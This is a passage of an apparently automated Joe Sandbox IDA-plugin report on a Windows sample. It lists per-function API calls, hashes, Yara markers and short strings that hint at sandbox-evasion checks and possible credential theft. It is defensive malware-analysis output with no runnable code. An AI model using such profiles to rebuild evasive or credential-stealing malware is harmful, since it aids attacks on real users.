                                          • Opcode ID: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction ID: e5c7e154de4c4d1c367a07e435c04d5c6b4328aee9638835bcfc4bd44421b57f
                                          • Opcode Fuzzy Hash: 427e3868cf694f15b19fe23a83d4bd4a241364a3348d377c3a02fcf3f873bae2
                                          • Instruction Fuzzy Hash: 2A111EB0D40208BBEB00DBE4CC4AFEE7779FB45B05F148549F704AB280D7B999008B95
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089F007
                                          • lstrcat.KERNEL32(?,00414820), ref: 0089F016
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089F064
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0089F070
                                          • lstrcat.KERNEL32(?,?), ref: 0089F088
                                          • lstrcpy.KERNEL32(?,00414672), ref: 0089F09A
                                          • lstrcat.KERNEL32(?,?), ref: 0089F0C9
                                          • lstrcat.KERNEL32(?,00414828), ref: 0089F0D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$HeapProcess
                                          • String ID:
                                          • API String ID: 947272703-0
                                          • Opcode ID: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction ID: 3c67d465808811b36def0db30a7cca9e5a25134bb5afb5712486eee99f1b60db
                                          • Opcode Fuzzy Hash: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction Fuzzy Hash: 534119B5900218AFDB10DF90DC88FDA77B9FB48304F14D69AE609A7141DF749A85CFA0
                                          APIs
                                          • lstrcat.KERNEL32(0040FE42,00000000), ref: 0040EDA0
                                          • lstrcat.KERNEL32(0040FE42,00414820), ref: 0040EDAF
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0040EDFD
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040EE09
                                          • lstrcat.KERNEL32(0040FE42,?), ref: 0040EE21
                                          • lstrcpy.KERNEL32(?,00414672), ref: 0040EE33
                                          • lstrcat.KERNEL32(0040FE42,?), ref: 0040EE62
                                          • lstrcat.KERNEL32(0040FE42,00414828), ref: 0040EE71
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$HeapProcess
                                          • String ID:
                                          • API String ID: 947272703-0
                                          • Opcode ID: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction ID: 58ace7e0d6db9fe93cd4eb589888f192107353e14a329c3ca55e17269f801fca
                                          • Opcode Fuzzy Hash: ed7883fb3685f41c365945d1ed134c9361c1de52cc20d4ee37231f3f0709d45e
                                          • Instruction Fuzzy Hash: 82410DB5900118AFDB10DFA0DC48FDA77B9BB48304F14D59AE609A7180DF749A85CFA4
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0089E657
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0089E65E
                                          • lstrcat.KERNEL32(?,0061846C), ref: 0089E790
                                          • lstrcat.KERNEL32(?,00618190), ref: 0089E7A3
                                          • lstrlen.KERNEL32(?), ref: 0089E7B0
                                          • lstrlen.KERNEL32(?), ref: 0089E7C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrcatlstrlen$AllocateProcess
                                          • String ID:
                                          • API String ID: 196298277-0
                                          • Opcode ID: 614a13f5e494e5adaa664876f4e1c625704d09857c2f29e338efd54800a4e892
                                          • Instruction ID: 875e99a1f109d11b17bdc77efe6a0aea93a610e669bc997602ceab33d09fc2fb
                                          • Opcode Fuzzy Hash: 614a13f5e494e5adaa664876f4e1c625704d09857c2f29e338efd54800a4e892
                                          • Instruction Fuzzy Hash: A4514FB1940218AFCB14EBA4DC89EED7779FB64700F088689B649D3190EF749B84CF91
                                          APIs
                                          • lstrcat.KERNEL32(?,00618268), ref: 0089E8A2
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089E8C8
                                          • lstrcat.KERNEL32(?,?), ref: 0089E8E7
                                          • lstrcat.KERNEL32(?,?), ref: 0089E8FB
                                          • lstrcat.KERNEL32(?,006181E8), ref: 0089E90E
                                          • lstrcat.KERNEL32(?,?), ref: 0089E922
                                          • lstrcat.KERNEL32(?,00618228), ref: 0089E936
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 0089E647: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0089E657
                                            • Part of subcall function 0089E647: RtlAllocateHeap.NTDLL(00000000), ref: 0089E65E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$AllocateProcesslstrcpy
                                          • String ID:
                                          • API String ID: 710630278-0
                                          • Opcode ID: cd3d44ec05564e5d911b939c83a930d633635ebf2fce865a58714dce4bb94620
                                          • Instruction ID: 3fa2a142a22779c1541035b3a3a4c11ac396f058e87c52ebfbe01217578212d8
                                          • Opcode Fuzzy Hash: cd3d44ec05564e5d911b939c83a930d633635ebf2fce865a58714dce4bb94620
                                          • Instruction Fuzzy Hash: 9C3171B2900218ABDF15FBA4CC89EED7379FB69700F084589B349D6091EE7197C8CB91
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E63B
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E661
                                          • lstrcat.KERNEL32(?,?), ref: 0040E680
                                          • lstrcat.KERNEL32(?,?), ref: 0040E694
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E6A7
                                          • lstrcat.KERNEL32(?,?), ref: 0040E6BB
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040E6CF
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 0040E3E0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0040E3F0
                                            • Part of subcall function 0040E3E0: RtlAllocateHeap.NTDLL(00000000), ref: 0040E3F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$AllocateProcesslstrcpy
                                          • String ID:
                                          • API String ID: 710630278-0
                                          • Opcode ID: 05efcce526faeb29057ae03a7f0838e895f82c593997a4498b9513fe27e23abf
                                          • Instruction ID: 62dfa2dff749b3e62b355dedf1c8d3531f46b6e9aa57b72c1fc6bf63700ee715
                                          • Opcode Fuzzy Hash: 05efcce526faeb29057ae03a7f0838e895f82c593997a4498b9513fe27e23abf
                                          • Instruction Fuzzy Hash: 1F3162B2A0020CABCB14FBA0DCC6EDD737DAB58744F44458EB71996095DEB497C8CB98
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A08D7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 008A08DE
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpy
                                          • String ID: :$C$\
                                          • API String ID: 3688308991-3809124531
                                          • Opcode ID: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction ID: d24a8953f1cc0361eb973a0d7286e8cba0198d715f7be334ab3d9fe7a84e404a
                                          • Opcode Fuzzy Hash: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction Fuzzy Hash: F93183B0D002489BEF10DBA4CC45FEE7B74FF49304F144099E649A7281DB74AA94CF95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410670
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00410677
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpy
                                          • String ID: :$C$\
                                          • API String ID: 3688308991-3809124531
                                          • Opcode ID: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction ID: 0fd743142e69857df810ca52e688dcb88c4bbbf11868c05daf949f8eeda1cfcd
                                          • Opcode Fuzzy Hash: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction Fuzzy Hash: 6431A6B1D00248AFDF10DBA4DC45BEE77B4AF48304F144099F6496B281DB78AAD4CF99
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00891445
                                          • __aulldiv.LIBCMT ref: 0089145F
                                          • __aulldiv.LIBCMT ref: 0089146D
                                          • ExitProcess.KERNEL32 ref: 0089149B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction ID: dd0d69526b5d19ea35da374972e1e53dbf7bffda5d569665b55f775bb53431a0
                                          • Opcode Fuzzy Hash: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction Fuzzy Hash: 49014BB0D44308BAEF10EBA0CC4AB9DBAB9FB15B05F288048F605B66C0CA749941C759
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011DE
                                          • __aulldiv.LIBCMT ref: 004011F8
                                          • __aulldiv.LIBCMT ref: 00401206
                                          • ExitProcess.KERNEL32 ref: 00401234
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction ID: 63c74367094331cdf1fb6dbb9c514130bce0dad876db1382a3ea100d6d0a74fc
                                          • Opcode Fuzzy Hash: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction Fuzzy Hash: BE01FFB0940208BADB10DBD0DC49B9EB678AB54705F24805EE605F71D1D6785545875D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4510935dae32e01c87bc0af17c3f7dd213755d20e0946cad16a3e658b4fae8c
                                          • Instruction ID: a25a0fdc19f9a63dd88459be6347ff72cc56fb63fe953cd54277964604b5bdb0
                                          • Opcode Fuzzy Hash: d4510935dae32e01c87bc0af17c3f7dd213755d20e0946cad16a3e658b4fae8c
                                          • Instruction Fuzzy Hash: BA5171B2900218AFCF24EBA4DC89EEE7379FB55700F088589B249D2080DB759B84CF91
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 008A0613
                                          • sscanf.NTDLL ref: 008A0640
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A0659
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A0667
                                          • ExitProcess.KERNEL32 ref: 008A0681
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID:
                                          • API String ID: 2533653975-0
                                          • Opcode ID: 462dc0eb1d88cde8c89c69557fbe249f80c6d6f5e505daf12c6dfc978de6a258
                                          • Instruction ID: 4f607afe54c60c026e7cbbc4141c929d074ea4d17515cbc6d6c5c637a8e52c8a
                                          • Opcode Fuzzy Hash: 462dc0eb1d88cde8c89c69557fbe249f80c6d6f5e505daf12c6dfc978de6a258
                                          • Instruction Fuzzy Hash: 2D21CBB1D14209AFDF04EFE8D845AEEB7B6FF48300F14952AE505E3250EB345608CB65
                                          APIs
                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00405C7A), ref: 00405869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: z\@$z\@
                                          • API String ID: 1029625771-3761194745
                                          • Opcode ID: ac16fded49e8aa3cf758ec64221ea8c8376f71899510e2d01cd7ec4d2b406570
                                          • Instruction ID: 80f3d9ff0f38952ba028e7ba221b2ae57abe6f94e1e5ed22da0b4b24787abaa8
                                          • Opcode Fuzzy Hash: ac16fded49e8aa3cf758ec64221ea8c8376f71899510e2d01cd7ec4d2b406570
                                          • Instruction Fuzzy Hash: B071C974A00609DFDB04DF44C584BAAB7B2FF88354F248269E8096B391D735AA81CF95
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcessstrtok_s
                                          • String ID: block
                                          • API String ID: 3407564107-2199623458
                                          • Opcode ID: 2506647f052ed3a4df0d6a83b175f1bdcd1895952038a32fe540106415373500
                                          • Instruction ID: 1016d52d12fe1e50a1f30153379403fab5e6bc016d8da4aea0e238377b65fe71
                                          • Opcode Fuzzy Hash: 2506647f052ed3a4df0d6a83b175f1bdcd1895952038a32fe540106415373500
                                          • Instruction Fuzzy Hash: 70515E75A40209EFCB00DFA1D988BEE77B5EF54709F20806AE905B72C1D7789A41CB9D
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400,?,?,0040EDEC,?,00000400), ref: 0040EC7D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040EC84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID: @$@
                                          • API String ID: 1357844191-2930932199
                                          • Opcode ID: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction ID: 0ad45b8a8120eac36b962287976033906f8581aa65983cfc467600e46e4bb566
                                          • Opcode Fuzzy Hash: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction Fuzzy Hash: 3B014075A40208BFEB10DBA8CC45FEE7779EB44704F208156FB05BB2C0DAB1AA009B59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 230ad20d9c83ca3b5eb331709680e1b624b2a9e64bc94dcdd16c4e7c20db88c2
                                          • Instruction ID: f5a1d19e87df58fe1b9490229d5de92fa471ca0443cbf811a3713ce9f342a5e3
                                          • Opcode Fuzzy Hash: 230ad20d9c83ca3b5eb331709680e1b624b2a9e64bc94dcdd16c4e7c20db88c2
                                          • Instruction Fuzzy Hash: D5613471900218AFCF14EBE4DC89EEA7779FB98701F088599B60993090EF749B84CF95
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID:
                                          • API String ID: 4038537762-0
                                          • Opcode ID: 45708fa9c051ce47051c56d8040ab57a7d21419f2f94184faeaa64b5423afe5c
                                          • Instruction ID: 65f961292ec7e2ec99a0647b9b1c4bb8ffb3005fdda93f7a89be9d24e6ff651b
                                          • Opcode Fuzzy Hash: 45708fa9c051ce47051c56d8040ab57a7d21419f2f94184faeaa64b5423afe5c
                                          • Instruction Fuzzy Hash: BE914DB29003189FDF24EBA4DC89EEE7379FB94700F088589B519D3191DB749A84CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: - $%s\%s$?
                                          • API String ID: 3722407311-3278919252
                                          • Opcode ID: 720d16db40e135c7f75593100d42ea90143e969699d313e809dc33ce6561c3aa
                                          • Instruction ID: 89dad39f6cc2188168badbc2d9d52fc6bc985f341d4410da9706d1249eaf062f
                                          • Opcode Fuzzy Hash: 720d16db40e135c7f75593100d42ea90143e969699d313e809dc33ce6561c3aa
                                          • Instruction Fuzzy Hash: FB71F976900118ABDB64DF50CD95FEAB7B9BF48304F0086DAA209A6190DF746FC9CF94
                                          APIs
                                          • memcmp.MSVCRT ref: 0040651B
                                          • memset.MSVCRT ref: 0040654E
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                            • Part of subcall function 00413050: lstrcpy.KERNEL32(?,00000000), ref: 00413096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlenmemcmpmemset
                                          • String ID: @$v10
                                          • API String ID: 1724756220-24753345
                                          • Opcode ID: 83eeb4b2afe74f17c85e7e2497b1b45e9e85ec7fad344035b0f7ebb7c51853e2
                                          • Instruction ID: e76eb520232f09c5838e303a6ffe8b8de85312eac25019e952f6e82f664b20c3
                                          • Opcode Fuzzy Hash: 83eeb4b2afe74f17c85e7e2497b1b45e9e85ec7fad344035b0f7ebb7c51853e2
                                          • Instruction Fuzzy Hash: 84413F71900208EFDB04DFA9CD95FDE7BB5BF44304F108119F906AB294DB78AA55CB98
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A0782
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A07A0
                                          • CloseHandle.KERNEL32(00000000), ref: 008A07B1
                                          • Sleep.KERNEL32(00001770), ref: 008A07BC
                                          • CloseHandle.KERNEL32(?,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A07D2
                                          • ExitProcess.KERNEL32 ref: 008A07DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction ID: 80a8b09a4d02ba7a657e847b6ce31a3110b92088265e77911c7856aa15caa423
                                          • Opcode Fuzzy Hash: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction Fuzzy Hash: 25F05E30900219AFF700ABA4DC46FBE33B4FF05B05F285415B612E28C1DBB56600CE52
                                          APIs
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          • GetSystemTime.KERNEL32(?,00000000,00414191,?,?,?,?,?,?,?,?,?,00403A73,?,00000014), ref: 004115F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SystemTimelstrcpy
                                          • String ID: s:@$s:@
                                          • API String ID: 62757014-2540443843
                                          • Opcode ID: 044bcc5253d9ed8355e8cc8fc245de3cc8e6ad25679a3886579f132f54362194
                                          • Instruction ID: 4fed1264785079df95f75e73a263aab63966ce5e4119c4fc5e1ac5e9256f35cb
                                          • Opcode Fuzzy Hash: 044bcc5253d9ed8355e8cc8fc245de3cc8e6ad25679a3886579f132f54362194
                                          • Instruction Fuzzy Hash: A611D672D00008AFCB04EFA9C8929EEBBB5EF58304F04C05EE41267155EF346A85CBA9
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0089EEE4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0089EEEB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID: /EA
                                          • API String ID: 1357844191-1082462857
                                          • Opcode ID: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction ID: 45901ec1f685e1bef81e82401a6cc483ea1d5f50eb68f03a08de2c1a9cbb906d
                                          • Opcode Fuzzy Hash: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction Fuzzy Hash: 9101ED75A40208BFDB10DBA4DC45FAD7B79EB44704F24815AF709AB2C4DAB1AA009B95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004112EC
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004112F3
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpy
                                          • String ID: %dx%d
                                          • API String ID: 3688308991-2206825331
                                          • Opcode ID: 9528033989b3831d53b234d39f9700782877631107d750be855e91c67b059de5
                                          • Instruction ID: 053404a165637cf86093b191cbbf08ad206c4db23522c9d29381cfac6920a88f
                                          • Opcode Fuzzy Hash: 9528033989b3831d53b234d39f9700782877631107d750be855e91c67b059de5
                                          • Instruction Fuzzy Hash: 7111EDB5A40209AFDB00DFE4DC49FAE7B79FB48701F14954AFA05A7290DA7099008B95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00411F8E,00000000), ref: 004117CB
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004117D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID: %hs
                                          • API String ID: 1357844191-2783943728
                                          • Opcode ID: 4d3c50648f06924e1988e1d7b9757bed8c573b7677992a8183437c42b4709702
                                          • Instruction ID: a4397fe6ced821d0dbd060ebb6f9329bd339c59d16e34419fedbf7be6031988b
                                          • Opcode Fuzzy Hash: 4d3c50648f06924e1988e1d7b9757bed8c573b7677992a8183437c42b4709702
                                          • Instruction Fuzzy Hash: 17E08C74A40208BFCB00CBD4DD4AEAD7BACEB44301F144095F90987280DEB19E009BA5
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089EE11
